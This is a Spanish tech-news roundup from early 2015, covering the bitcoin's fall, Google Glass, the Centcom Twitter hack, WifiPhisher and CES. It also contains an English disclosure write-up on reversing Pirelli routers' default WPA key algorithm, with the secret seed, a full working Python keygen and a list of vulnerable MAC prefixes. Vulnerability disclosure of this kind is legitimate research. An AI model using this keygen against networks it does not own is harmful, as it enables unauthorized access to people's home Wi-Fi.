La moneda ya ha caído 39 por ciento desde el 31 de diciembre del año pasado y su valor actual ya es 83 por ciento inferior a su máximo histórico de casi 1.200 dólares por unidad, registrado en enero de 2014. El 14 de enero cerró por debajo de los 200 dólares.¿El barco se hunde?
La moneda virtual bitcoin enfrenta uno de sus peores momentos desde que adquirió fama y valor en el mercado. El pasado 14 de enero, su precio se desplomó 21 por ciento con respecto a la jornada anterior, lo que la ubicó en 179 dólares. Es la cotización más baja de esta divisa electrónica desde marzo de 2013. El jueves 15 de enero se recuperó levemente y ronda los 200 dólares por unidad.
La moneda ya ha caído 39 por ciento desde el 31 de diciembre del año pasado y su valor actual ya es 83 por ciento inferior a su máximo histórico de casi 1.200 dólares por unidad, registrado en enero de 2014.
El futuro de esta divisa está comprometido. Para los expertos del portal CoinDesk, se encuentra en situación de riesgo porque su cotización se ubica por debajo de los 250 dólares.
Marshall Swatt, director de tecnología de Coinsetter, una casa de cambio de esta divisa, cree que la bitcoin atraviesa un momento pasajero, como le ocurre al petróleo, y espera que el desplome no se prolongue.
Jeffrey Gundlach, presidente de la firma de inversión DoubleLine, expresó en una conferencia transmitida por internet el 13 de enero, que la bitcoin “será relegada a la pila de cenizas de las divisas digitales”.
La pronunciada caída ha empezado a generar pánico entre quienes invirtieron en bitcoins. El 14 de enero, se reportó una venta masiva de esta divisa. Parte de quienes creían en su futuro, ahora quieren deshacerse de ella lo más rápido posible. Ello ahonda su depreciación.
Como antecedente, dos días atrás, el 12 de enero, la casa de cambio BitStamp sufrió un ataque cibernético que supuso pérdidas por 5 millones de dólares. Se robaron 19.000 bitcoins.
Fue un golpe más a la frágil credibilidad de bitcoin. Aún se recuerda, con recelo, la quiebra de la casa de cambio japonesa MtGox, que cerró su página web en febrero de 2014 tras un ataque cibernético en el que se robaron 700 millones de dólares en monedas digitales.
Como consecuencia de los vaivenes de la bitcoin durante 2014, el medio especializado en economía Bloomberg no dudó en calificarla como la peor moneda del año.
La web empresarial Quartz se fue lanza en ristre contra la criptomoneda y la coronó como la peor inversión posible. A esa voz se unieron otros medios, entre ellos ‘The Guardian’. No fue para menos, el año pasado arrancó en 1.000 dólares y terminó en 350.
LA BURBUJA DE BITCOIN
Matt O’Brien, redactor económico de ‘The Washington Post’, considera que la divisa digital se desinfló porque “carece de valor inherente. Casi nadie la usa para nada que no sea comprar estupefacientes”.
Y da otra razón “los mineros de bitcoin pidieron dinero prestado para financiar su actividad -generar bitcoins mediante sistemas de cómputo-. Ese dinero solo lo pueden pagar si el valor de la moneda se mantiene alto”.
A modo de contexto, las unidades de bitcoin no se generan de forma espontánea. Se usan computadores para resolver complejas operaciones matemáticas que, una vez zanjadas, dan como resultado monedas.
A medida que pasa el tiempo, se va requiriendo cada vez más poder para resolver las operaciones referidas. Para lograrlo en menor tiempo, los ‘mineros’ han alquilado granjas de servidores completos enfocados en obtener bitcoins.
Los mineros creyeron en el futuro de bitcoin -específicamente que su alto valor se mantendría- y solicitaron préstamos para financiar el poder de cómputo necesario para obtener las monedas. Ahora que su precio se ha derrumbado, la están vendiendo de inmediato y, en el peor de los casos, se han retirado de la actividad, como ocurrió con la compañía One Bitcoin exchange.
La bitcoin empezó el 2013 con un valor inferior a 10 dólares y, en cuestión de 4 meses, ya se ubicaba por encima de los 200 dólares.
Despegó virtud de la especulación y de un exagerado entusiasmo.
El desplome contrasta con el apoyo que ha recibido por parte de algunas empresas y gobiernos. Por ejemplo, en julio del 2014, el Estado de California (EE. UU.) la aprobó; en diciembre, Microsoft anunció que permitirá el pago de aplicaciones y servicios con bitcoin en algunas de sus tiendas en ese país.
Otras empresas ya la adoptaron o lo planean hacer, como Zynga, Paypal, Overstock, Target, Amazon, Victoria Secret, Reddit, Virgin Galactic y Subway, solo por mencionar algunas de las más representativas.
En Colombia, no se ha restringido el uso de la moneda, pero en marzo del año pasado la Superfinanciera emitió una circular advirtiendo que no se trataba de una divisa legal.
Por ahora, el futuro de la bitcoin se encuentra marcado por alargadas sombras, pero es pronto para declarar su muerte, 6 años después de su creación.
¿QUÉ ES BITCOIN?
Bitcoin es una moneda digital, que sirve para comprar y vender productos en Internet. Su creación y distribución no se encuentra atada a ninguna autoridad central, gobierno o institución, incluso se puede usar en cualquier país del mundo.
Se trata de una divisa controlada y almacenada en computadores, la cual usa criptografía (complejos cálculos matemáticos) para validar cada transacción. Es una forma de pago, como lo son las tarjetas de crédito o PayPal.
Esta moneda se puede guardar en billeteras digitales, en el teléfono móvil, en discos duros, o en portales web especializados. Como no existen intermediarios entre quienes usan bitcoin, no supone costos adicionales ni restricciones.
Las bitcoin se introdujeron por primera vez en el 2008. El protocolo fue creado por un programador conocido bajo el seudónimo de Satoshi Nakamoto. El sistema fue concebido para funcionar gracias a una enorme red de computadoras (cada una de ellas es una ‘mina’ o fuente de bitcoins).
Las bitcoin son, en esencia, largas direcciones de internet, de 33 caracteres, que se guardan en un libro de cuentas llamado ‘Blockchain’.
Fuente
De la mano de los desarrolladores de la conocida Kali Linux de Offensive Security hay la versión para Android llamada Kali Linux Net Hunter , una ROM compatible con teléfonos móviles One Plus y Nexus rooteados.
Con la versión 1.1 de NetHunter inauguran el soporte al teléfono chino One Plus
Hay que tener en cuenta que para realizar los ataques Wifi será necesario conectar una antena externa Wifi USB vía cable OTG.
No se puede usar el Wifi interno del dispositivo para realizar ataques.Algunos de los Wifi USB externos soportados son:
TL-WN722N (Based on Atheros AR9271, using the ath9k driver)
SWX-SR71 (Based on Atheros AR9170, using the carl9170 driver)
SMCWUSB-N2 (Based on Atheros AR9170, using the carl9170 driver)
AWUS036H (Based on Realtek RTL8187, using the rtl8187 driver)
Leer mas ….
Hasta ahora, los desarrolladores de software podían adquirirlo. La empresa dice que el proyecto sigue en pie.
Google dejará de vender sus anteojos inteligentes Google Glass a desarrolladores.
La noticia se conoció este jueves, pero la compañía indicó que seguirá trabajando en el lanzamiento de estos anteojos como producto de consumo, aunque lo hará de otro modo, según difundió la BBC.
El programa Explorer de Google, lanzado en 2013, ofrecía a los desarrolladores de software la posibilidad de comprar Google Glass a 1500 dólares para generar aplicaciones.
La expectativa generalizada era que en algún momento la venta se abriera al público.
Ahora, la empresa suspende su programa Glass Explorer, y el equipo de Glass pasará a trabajar por fuera de la división Google X, donde lo venía haciendo.
A partir de la semana que viene Google dejará de tomar pedidos, pero aseguró que seguirá dando soporte a las empresas que usan Google Glass.
La compañía dijo que seguirá trabajando en el futuro del producto, pero no dio plazos para la puesta en marcha de cualquier nueva versión.
Fuente
Los especialistas recomiendan no separarse de los teléfonos durante situaciones cotidianas que implican gran atención ya que podrían tener un resultado cognitivo más pobre en estas tareas.
Investigadores de la Universidad de Missouri han descubierto que la separación de una persona con su smartphone puede tener graves efectos psicológicos y fisiológicos en los usuarios de iPhone, incluyendo malos resultados en pruebas cognitivas.
El nombre de la investigación es iPhone Separation Linked to Physiological Anxiety, Poor Cognitive Performance, MU Study Find. Y los hallazgos sugieren que los usuarios de iPhone deben evitar separase de sus teléfonos durante situaciones cotidianas que implican una gran cantidad de atención, tales como realizar pruebas, sentarse en conferencias o reuniones o completar labores importantes de trabajo; ya que podrían tener un resultado cognitivo más pobre en el rendimiento en estas tareas.
“Nuestros hallazgos sugieren que la separación del iPhone puede afectar negativamente al rendimiento de las tareas mentales”, dice Russell Clayton autor principal del estudio. “Adicionalmente, los resultados de nuestro estudio sugieren que los iPhone son capaces de convertirse en una extensión de nosotros mismos de tal manera que cuando nos separamos, experimentamos una disminución del ‘yo’ y un estado fisiológicamente negativo”.
Para poder llegar a estas conclusiones los autores del estudio engañaron a los sujetos que participaron en él. Le dijeron que estaban probando un sistema inalámbrico para medir la presión arterial. Para ello los sujetos tuvieron que realizar puzzles con y sin su iPhone. El estudio hace alusión al iPhone porque sus 40 participantes eran usuarios de este dispositivo.
Para separarlos de sus teléfonos, les explicaron que estos causaban interferencia por el Bluetooth. Y los investigadores llamaron por teléfono a los sujetos mientras estaban separados de sus iPhone para comprobar el nivel de estrés que les generaba el no poder contestar mientras realizaba los puzzles.
Y debido a esto, los investigadores encontraron un aumento significativo de la ansiedad, la frecuencia cardíaca y la presión arterial. Además de una disminución significativa en el rendimiento cuando no se estaba cerca del teléfono.
Fuente
“Ya estamos en sus PC, en cada base militar estadounidense”, amenazó el grupo terrorista en los perfiles del Centcom. La red de microblogging dio de baja la cuenta
Ciberterroristas del Estado Islámico (ISIS, por sus siglas en inglés) piratearon hoy la cuenta de Twitter y YouTube del comando militar estadounidense en Medio Oriente (Centcom) y difundió documentos confidenciales del Ejército norteamericano; entre ellos, las direcciones personales de oficiales.
Entre la información filtrada, se encuentran direcciones de trabajo y números de teléfonos (algunos supuestamente ya dados de baja) de la cúpula militar estadounidense; entre ellos, los del jefe del Estado Mayor Conjunto, el general Martin Dempsey.
“SOLDADOS NORTEAMERICANOS, ESTAMOS YENDO, MIREN SUS ESPALDAS”, AMENAZARON EN UNO DE LOS MENSAJES
“Soldados norteamericanos, estamos yendo, miren sus espaldas”, amenazaron en uno de los mensajes pirateados. “El ISIS ya está aquí, estamos en sus PC, en cada base militar estadounidense”, escribieron. La cuenta de Twitter fue desactivada a los pocos minutos.
El ataque ocurre horas antes de que el presidente de los Estados Unidos, Barack Obama, ofrezca un discurso sobre ciberseguridad.
“Podemos confirmar que el Comando central de EEUU ha sido comprometido. Centcom está tomando todas las medidas para solucionar el asunto”; afirmó un oficial de Defensa a la cadena de noticias CNN.
A las 12:30, hora de EEUU, se publicó el primer tuit que amenazaba a los soldados estadounidenses y el perfil cambió por completo su estética: todo se volvió negro, con una persona vistiendo el tradicional keffiyeh en la cabeza.
“El CiberCalifato, bajo los auspicios del ISIS, continúa su CiberYihad. Mientras Estados Unidos y sus satélites asesinan a nuestros hermanos en Siria, Irak y Afganistán, nosotros ingresamos en sus redes y aparatos personales y sabemos todo sobre ustedes”, indicaba uno de los mensajes.
“Ciber Califa” y “I love you ISIS” son las consignas que también aparecieron en la información del perfil. Sin embargo, minutos después, la cuenta ya había sido suspendida.
Otros tuits muestraban supuestos escenarios por posibles crisis militares con China y Corea del Norte, aunque en un principio la información parece no ser más que un resumen general de las capacidades militares de estos dos países
La cuenta de YouTube del Mando Central, donde el Pentágono publica los videos de sus bombardeos contra posiciones del ISIS en Irak y Siria, también sufrió un ataque similar de manera simultánea.
Entre los vídeos publicados por los piratas informáticos se encontraba el de “Flames of War”, un video propagandístico de los extremistas sunitas en el que se amenaza a Estados Unidos y se muestran imágenes de ejecuciones sumarias.
Fuente
Una nueva herramienta lanzada por un grupo griego de seguridad ha hecho que hackear wifi, la conexión inalámbrica entre dispositivos que acceden a internet, sea ahora mucho, mucho más sencillo y peligroso. Lo que hace a WifiPhisher más peligroso es que evitar típicos métodos de ataque, y en lugar de ello, hace uso de engaños para obtener rápidamente una contraseña.
Cómo funciona WifiPhisher y por qué es tan peligroso?
El método común para hackear wifi toma bastante tiempo porque esencialmente se están probando cientos de miles de combinaciones de contraseñas contra un router para así obtener acceso. Esto se conoce como “brute force” o ataques de fuerza bruta. Son exitosos, pero toman tiempo.
El nuevo método implementado por Wifiphisher actúa de una manera totalmente diferente. Lo que la aplicación hace, es básicamente clonar y replicar a un punto de acceso familiar de la víctima, mientras que simultáneamente se bloquea el acceso al router original. Con Wifiphisher, estamos haciéndole creer a la persona que está teniendo problemas de autentificación, al obligar a todos los clientes conectados al punto de acceso original a desconectarse. Al hacerse pasar por el router original (enviando incluso una página falsa preguntando por la contraseña), los incautos usuarios simplemente ingresan la contraseña falsa al router, proporcionándosela voluntariamente a esta réplica maligna.
Y una vez que se obtiene la contraseña original, este “gemelo diabólico” puede seguir operando como intermediario de conexión (entre el punto de acceso original y los clientes), interceptando todo el tráfico que transita por ahí. Sí, esto podría llevarnos a robo de contraseñas, información y muchísimo más.
El ataque es una inteligente mezcla de ingeniería social (el método más común de hacking), con una sencilla pero funcional aplicación
Fuente
Descripción
Con Magine TV que puede ver la televisión en cualquier lugar, en cualquier momento y en cualquier pantalla que desee.
Ver en vivo y catch-up TV en el movimiento o en la casa de la pantalla de su elección. Accede a tus canales favoritos de TV, literariamente por su alcance.
Diga adiós a los complicados montajes, obtener más mí-tiempo, sólo zambullirse
Hola ,
Le escribimos para informarle que Magine TV cierra su periodo de prueba BETA en España el 1 de Febrero de 2015. Antes de que esto ocurra, queremos darle las gracias por haber participado. Hemos recibido una respuesta muy positiva, ha sido divertido y hemos aprendido mucho.
Magine AB ha decidido esperar un mejor momento para realizar el lanzamiento comercial en España.
Pedimos disculpas por cualquier inconveniente que esto pueda causarle.
¡Esperamos volver a España en el futuro!
Gracias de nuevo,
/Magine TV
El año pasado, la compañía Sleep Number IQ ya presentó una cama conectada que monitoriza la calidad de nuestro sueño. El siguiente paso este año es una cama conectada que, además, permite a los padres saber si el niño duerme o no con solo consultar el móvil.
En vez de confiar en pulseras cuantificadoras, todo el colchón de esta cama futurista está lleno de sensores de presión que miden los movimientos del niño, y hasta su pulso y ritmo respiratorio. Todos estos datos se envían a una aplicación móvil.
La cama también emite alertas cuando el niño abandona la cama en mitad de la noche, e incluso enciende unas luces bajo la estructura para reducir el miedo que el pequeño pueda tener a dormir solo. La cama ofrece diferentes cámaras de aire que pueden inflarse o desinflarse mediante la aplicación para dejar la cama al gusto del niño.
Fuente
A couple of years ago whether I do not remember badly, I was doing reverse engineering in some Spanish routers deployed by Pirelli as well. After I extracted the firmware and found out a suspicious library with many references to key generation’s functions everything was over. Unfortunately, I could not recover the algorithm itself. Principally, because those routers were not using the same algorithm for generating default keys and simply because such algorithm was not explicitly there. Shit happens! However, as I could not reveal the algorithm then decided to try another way to recover keys. Eventually, I realised that these routers were vulnerable to unauthorized and unauthenticated remote access and any adversary could fetch HTML code from our public IP address. Plenty of HTMLs were able to be downloaded without any restriction, meaning a huge leakage. Being vulnerable to a bunch of evil attacks. This remote information disclosure can be seen on this CVE-2015-0554. On the other side, I do not know whether Argentinian routers are also vulnerable to this vulnerability. Feel free to try it out and let me know too. Just to see how easy was to achieve those keys in the HomeStation(essids-like WLAN_XXXX) in Spain, a simple curl command was enough:
Today I am gonna explain how I reverse engineered a MIPS library in order to recover the default WPA key generation algorithm for some Argentinian routers deployed by Pirelli. Concretely the router affected is the model P.DG-A4001N. First of all, I am neither Argentinian nor live there. Nevertheless, accidentally I observed some stickers from Pirelli routers in a random forum and as an user had already publicly published the firmware for those routers then I decided to give a try. As I still remembered the file where I dug into for the Spanish routers, I rapidly tried to recover the algorithm in these routers. Next writing is the way I followed until to achieve it.
Reverse-engineering the default key generation algorithm
In this section, we are going to reverse engineer a MIPS library, /lib/private/libcms.core, found out in the firmware itself. First of all, let us comment that the firmware was extracted for another user (fernando3k) and subsequently extracted by using Binwalk and firmware-mod-kit. Once was mounted into our system, we found out a function called generatekey. As you have seen, symbols have not been removed in binaries and external function names are still there because dynamic compilation. This help us a lot in our reverse engineering task. On top of that, we rapidly saw how this function was calling to another one called generatekey_from_mac. At this moment, I decided to give a go to this challenge. Before get started, IDA Procan help us with the cross references (Xrefs to-from in IDA Pro) between functions. Let’s see how functions are called in the library. (Zoom pictures in to see properly)
Really looking great! Now let’s look at the cross references. We have figured out some tips:
generatekey calls generatekey_from_mac. This allow us to suppose that the mac address is involved in the key generation algorithm. Besides, getPBSHwaddr returns a mac address and it is also called by generatekey. Verification was carried out after checking how getPBSHwaddr returned the value of /var/hwaddr ( “ifconfig %s > /var/hwaddr “)
SHA256 cryptographic hash function is also involved. We then know that our key is coming from a well-known hash function. This way to generate WPA keys is very popular in some vendors because the feeling of “randomness”. Digging into this function will give us the main structure of our algorithm.
The function createWPAPassphraseFromKey is called by wlWriteMdmDefault ,which also calls to generatekey as well. Hence, we discover a function called bintoascii which is basically responsible to convert binary to ascii data.
The SSID is also created from the mac address although it is not relevant for our task.
Now we must dissect the generatekey_from_mac function and its SHA256 callings to figure out how many parameters are being sent as input data. Before calling generatekey, a string “1236790” is sent to this function as first argument ($a3). Nonetheless, we have to guess which is the right order for the SHA256 function, I mean how many updates there are. If we observe the below picture, we will see this step.
From generateKey_from_mac we realise that: (Look at below image)
First argument is located at offset 0x000d29e0
Second argument is the string we discovered previously (“1236790”)
Third argument it has to be the mac address because there is an instruction load immediate with the value 6. Since a mac address is 6 bytes, we can try it out now.
As we know that the first argument is located at the offset 0xd29e0, just a jump there and let’s reveal the secret seed used in the SHA256. Now we have guessed the first argument, and we can prepare those 32 bytes into a byte-array structure to generate the SHA256 hash later on. This secret seed has been used by Pirelli too in other countries like Italy or Austria (Look at the references on the source code for more info). Furthermore, below that we can also distinguish the charset finally used to generate keys with.
In the end, we conclude that the algorithm is as follows: (mac address needs to be incremented by 1)
SHA256(secret_seed+”1236790″+mac_address)
More details on how keys are eventually generated in this python function:
def genkey(mac):
seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
'\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')
lookup = '0123456789abcdefghijklmnopqrstuvwxyz'
sha256 = hashlib.sha256()
sha256.update(seed)
sha256.update('1236790')
sha256.update(mac)
digest = bytearray(sha256.digest())
return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])
Problems
Since I attempted to do a responsible disclosure and neither ADB Pirelli nor Arnet Argentina were interested to discuss the problem, I have finally decided to do full disclosure to speed up the process of fixing. It looks like the only way with some vendors, just enforce them to replace routers for avoiding intrusions. Many things can happen whether your router with SSID Wifi-Arnet-XXXX has the default password. For your information, default passwords are located in a sticker at the bottom of routers. If you are owner of these networks, please change your password as soon as possible. You should always change the default passwords, though. An adversary, within of the wifi range, could access to your network and commit any sort of fraud. Be safe and change the passwords right now!
Timeline
2014-09-11 Found the algorithm 2014-09-12 Send a message to @ArnetOnline via Twitter @enovella_ 2014-09-15 Send a message via website, still looking for a simple mail 2014-09-16 Send another message to Arnet via website.First reply via twitter where they redirect me to the website form. 2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key 2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though. 2014-09-23 I assume that Arnet does not care about its clients’ security at all regarding its little interest. 2014-09-24 I send the problem to the vendor ADB Pirelli via website form 2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland 2015-01-05 Full disclosure
Proof-of-concept
This proof-of-concept and many Pirelli default key generation algorithms might be found at my Bitbucket repository. I hope you can use them. Also a copy&paste of the first version can be looked at below. To be installed just make sure you got git installed on your system and then run:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@license: GPLv3
@author : Eduardo Novella
@contact: ednolo[a]inf.upv.es
@twitter: @enovella_
-----------------
[*] Target :
-----------------
Vendor : ADB broadband Pirelli
Router : Model P.DG-A4001N
ISP : Arnet Telecom Argentina
Possible-targets : http://hwaddress.com/?q=ADB%20Broadband%20Italia
Firmware : http://foro.seguridadwireless.net/puntos-de-acceso-routers-switchs-y-bridges/obtener-firmware-adb-p-dg-a4001n-%28arnet-telecom-argentina%29/
-----------------
[*] References :
-----------------
[0] [AUSTRIA] A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
[1] [ITALY] Alice AGPF: The algorithm! http://wifiresearchers.wordpress.com/2010/06/02/alice-agpf-lalgoritmo/
-----------------
[*] Test vectors :
-----------------
http://www.arg-wireless.com.ar/index.php?topic=1006.msg6551#msg6551
-----------------------
[*] Acknowledgements :
-----------------------
Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it, and christian32 for showing me a bunch of test vectors.
-----------------
[*] Timeline :
-----------------
2014-09-11 Found the algorithm
2014-09-12 Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15 Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24 I send the problem to the vendor ADB Pirelli via website form
2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05 Full disclosure
-----------------
[*] TODO :
-----------------
1.- Reverse-engineering the function generateSSIDfromTheMac. It is not relevant though.
2.- Extract more firmwares from others vendors and send them to me.
'''
import re
import sys
import hashlib
import argparse
VERSION = 1
SUBVERSION = 0
DATEVERSION = '2014-09-11'
URL = 'http://www.ednolo.alumnos.upv.es'
def genkey(mac,stdout='True'):
seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
'\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')
lookup = '0123456789abcdefghijklmnopqrstuvwxyz'
sha256 = hashlib.sha256()
sha256.update(seed)
sha256.update('1236790')
sha256.update(mac)
digest = bytearray(sha256.digest())
if (stdout):
print "[+] SHA256 : %s" % sha256.hexdigest()
return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])
def printTargets():
print "[+] Possible vulnerable targets so far:"
for t in targets:
print ("\t bssid: {0:s}:XX:XX:XX \t essid: Wifi-Arnet-XXXX".format(t.upper()))
sys.exit()
def checkTargets(bssid):
supported = False
for t in targets:
if ( bssid.upper().startswith(t) ):
supported = True
break
if (not supported):
print "[!] Your bssid looks like not supported! Generating anyway."
def main():
global targets
version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL)
targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',
'30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F']
parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far
only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es''',
epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])
)
maingroup = parser.add_argument_group(title='required')
maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
command_group = parser.add_mutually_exclusive_group()
command_group.add_argument('-l','--list', help='List all vulnerable targets (essid Wifi-Arnet-XXXX)', action='store_true')
args = parser.parse_args()
if args.list:
printTargets()
elif args.bssid:
mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
if len(mac_str) != 12:
sys.exit('[!] Check MAC format!\n')
try:
mac = bytearray.fromhex('%012x' %(int(mac_str,16) +1))
except:
sys.exit('[!] Use real input :)')
checkTargets(args.bssid)
print '[+] SSID : Wifi-Arnet-XXXX'
print '[+] MAC : %s' % args.bssid
print '[+] WPA key : %s' % (genkey(mac,False))
else:
parser.print_help()
if __name__ == "__main__":
main()
El martes empieza la mayor feria de tecnología, con novedades sorprendentes.
La Feria Internacional de Electrónica de Consumo (CES) 2015, que se celebra del 6 al 9 de enero en Las Vegas, EE.UU., se ha convertido en el centro de atención para todos los aficionados a la tecnología por su prestigio y el nivel de los proyectos que serán presentados durante el evento.
El portal PC World ha destacado los proyectos más esperados que serán presentados a lo largo del evento.
Año crucial para los televisores 4K
El 2015 será un año en el que los televisores con resolución máxima de 1080p serán reemplazados por 4K. Poco a poco llega el material audiovisual en esta definición y la mayoría de los gigantes tecnológicos apuestan por esta tecnología. Además, las grandes empresas ya desarrollan ultra-alta definición de 8K que, sin embargo, todavía seguirá siendo inaccesible para los usuarios durante algunos años.
La ‘casa inteligente’ se hace aún más inteligente
Si en 2014 el centro de atención de la feria fue la tecnología ‘wearable’, es decir, dispositivos que se incorporan de alguna manera a nuestro cuerpo con el fin de realizar funciones específicas, esta vez será el concepto de ‘casa inteligente’. Por primera vez los dispositivos relacionados con el hogar ‘inteligente’ tendrán su propia sala. Los desarrolladores aseguran que este tipo de sistemas abre la nueva era en que todo el funcionamiento de la casa (iluminación, seguridad, cerraduras de puertas, etc.) ya no dependerá de un único eje central. Controlar todo el hogar pronto se podrá hacer con un teléfono móvil o una ‘tablet’.
Los dispositivos ‘wearable’ seguirán avanzando el próximo año. Entre los más esperados se encuentran un proyecto de Thync que podrá cambiar el estado de ánimo que deseemos, ya sea tranquilidad o excitación. Por otra parte, el público conocerá las modificadas medias Sensoria Fitness, capaces de monitorizar en tiempo real todos los datos biométricos para correr sin lesiones, o Vert, un dispositivo que registra los saltos durante un partido de basquet o de voleibol.
Teléfonos y computadoras
Como cualquier otro año, los dispositivos ‘tradicionales’ también presentan sus novedades. Se espera que este año sea muy productivo para la tecnología basada en Android. De hecho, Samsung, Sony y LG podrían presentar sus nuevas generaciones de ‘smartphones’. Por otro lado, uno de los eventos más esperados de la feria está relacionado con el mercado de los computadoras: Intel presentará su nueva procesadora Broadwell-U.
Dispositivos para controlar su coche
En la feria de Las Vegas serán también centro de atención tres tecnologías que presentarán sus nuevas actualizaciones: Apple CarPlay, Android Auto y MirrorLink. La primera ofrece a los conductores una forma más inteligente, segura y divertida de usar el iPhone con solo pronunciar una palabra o con un leve toque con el dedo. Android Auto, el mayor rival de Apple CarPlay, también permite desarrollar el entretenimiento a bordo a partir de una interfaz simplificada y siguiendo órdenes de voz. Por último, los visitantes de la feria podrán conocer más sobre MirrorLink, que deja ver en la pantalla táctil del coche pantallas configuradas para móvil.
Fuente
hwagm.elhacker.net
Si deseas continuar utilizando este sitio debes aceptas el uso de cookies. Política de Cookies
Los ajustes de cookies de esta web están configurados para "permitir cookies" y así ofrecerte la mejor experiencia de navegación posible. Si sigues utilizando esta web sin cambiar tus ajustes de cookies o haces clic en "Aceptar" estarás dando tu consentimiento a esto.